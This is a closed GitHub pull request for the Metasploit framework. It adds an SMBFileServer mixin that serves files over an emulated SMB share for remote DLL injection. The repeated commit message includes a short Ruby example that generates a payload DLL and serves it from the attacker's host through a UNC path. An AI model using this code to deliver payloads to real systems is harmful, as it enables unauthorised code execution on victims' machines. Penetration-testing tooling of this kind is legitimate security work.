Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Implement SMBFileServer mixin. #3075

Closed
wants to merge 12 commits into from
Closed

Implement SMBFileServer mixin. #3075

wants to merge 12 commits into from

Commits on Mar 7, 2014

  1. Implement SMBFileServer mixin. 

    In order to accomplish remote file injection (e.g. DLL) this module
emulates an SMB service process to allow clients to load a file from a
network share.

This commit implements the SMBFileServer exploit module utilising the
::Rex::Proto::SMB::Server module to export the "start_smb_server"
function.

Utilising the module (example):
 include Msf::Exploit::Remote::SMBFileServer
 exe = generate_payload_dll
 @exe_file = rand_text_alpha(7) + ".dll"
 @share = rand_text_alpha(5)
 my_host = (datastore['SRVHOST'] == '0.0.0.0') ?
 Rex::Socket.source_address : datastore['SRVHOST']
 @unc = "\\#{my_host}\#{@share}\#{@exe_file}"
 start_smb_server(@unc, exe, @exe_file)
 // Inject DLL
 handle

A separate commit will provide a sample implementation of utilising this
module within a generic webserver DLL injection exploit:
./exploits/windows/http/generic_http_dllinject.rb
    Matthew Hall committed Mar 7, 2014
    Configuration menu
    Copy the full SHA
    88df736 View commit details
    Browse the repository at this point in the history

Commits on Mar 12, 2014

  1. Tidy lib/msf/core/exploit/smb.rb following feedback from jlee-r7. 

     * Doc comments wrap at 78 chars to follow yardoc convention
 * Remove unused :server and SERVER vals
 * Use Utils class directly
 * Stop server within an ensure
 * Change SRVHOST to an OptAddress
    Matthew Hall committed Mar 12, 2014
    Configuration menu
    Copy the full SHA
    88d06c6 View commit details
    Browse the repository at this point in the history

  2. Add yardoc documentation for Msf::Exploit::Remote::SMBFileServer

    Matthew Hall committed Mar 12, 2014
    Configuration menu
    Copy the full SHA
    fe02ba5 View commit details
    Browse the repository at this point in the history

  3. Add example usage to Msf::Exploit::Remote::SMBFileServer documentation

    Matthew Hall committed Mar 12, 2014
    Configuration menu
    Copy the full SHA
    eaf908c View commit details
    Browse the repository at this point in the history

Commits on Feb 17, 2015

  1. Fix minor issue in chromecast_youtube

    @wvu
    wvu committed Feb 17, 2015
    Configuration menu
    Copy the full SHA
    a4c6e42 View commit details
    Browse the repository at this point in the history

  2. Merge with master

    Matthew Hall committed Feb 17, 2015
    Configuration menu
    Copy the full SHA
    6c68f0a View commit details
    Browse the repository at this point in the history

  3. Implement SMBFileServer mixin. 

    In order to accomplish remote file injection (e.g. DLL) this module
emulates an SMB service process to allow clients to load a file from a
network share.

This commit implements the SMBFileServer exploit module utilising the
::Rex::Proto::SMB::Server module to export the "start_smb_server"
function.

Utilising the module (example):
 include Msf::Exploit::Remote::SMBFileServer
 exe = generate_payload_dll
 @exe_file = rand_text_alpha(7) + ".dll"
 @share = rand_text_alpha(5)
 my_host = (datastore['SRVHOST'] == '0.0.0.0') ?
 Rex::Socket.source_address : datastore['SRVHOST']
 @unc = "\\#{my_host}\#{@share}\#{@exe_file}"
 start_smb_server(@unc, exe, @exe_file)
 // Inject DLL
 handle

A separate commit will provide a sample implementation of utilising this
module within a generic webserver DLL injection exploit:
./exploits/windows/http/generic_http_dllinject.rb
    Matthew Hall committed Feb 17, 2015
    Configuration menu
    Copy the full SHA
    8beed56 View commit details
    Browse the repository at this point in the history

  4. Tidy lib/msf/core/exploit/smb.rb following feedback from jlee-r7. 

     * Doc comments wrap at 78 chars to follow yardoc convention
 * Remove unused :server and SERVER vals
 * Use Utils class directly
 * Stop server within an ensure
 * Change SRVHOST to an OptAddress
    Matthew Hall committed Feb 17, 2015
    Configuration menu
    Copy the full SHA
    5cf8833 View commit details
    Browse the repository at this point in the history

  5. Add yardoc documentation for Msf::Exploit::Remote::SMBFileServer

    Matthew Hall committed Feb 17, 2015
    Configuration menu
    Copy the full SHA
    cec8179 View commit details
    Browse the repository at this point in the history

  6. Add example usage to Msf::Exploit::Remote::SMBFileServer documentation

    Matthew Hall committed Feb 17, 2015
    Configuration menu
    Copy the full SHA
    9e2a483 View commit details
    Browse the repository at this point in the history

  7. Merge with master

    Matthew Hall committed Feb 17, 2015
    Configuration menu
    Copy the full SHA
    547d4d1 View commit details
    Browse the repository at this point in the history

  8. Merge branch 'module-exploitsmbfileserver' of github.com:0x41414141/m… 

    …etasploit-framework into module-exploitsmbfileserver
    Matthew Hall committed Feb 17, 2015
    Configuration menu
    Copy the full SHA
    d4aa444 View commit details
    Browse the repository at this point in the history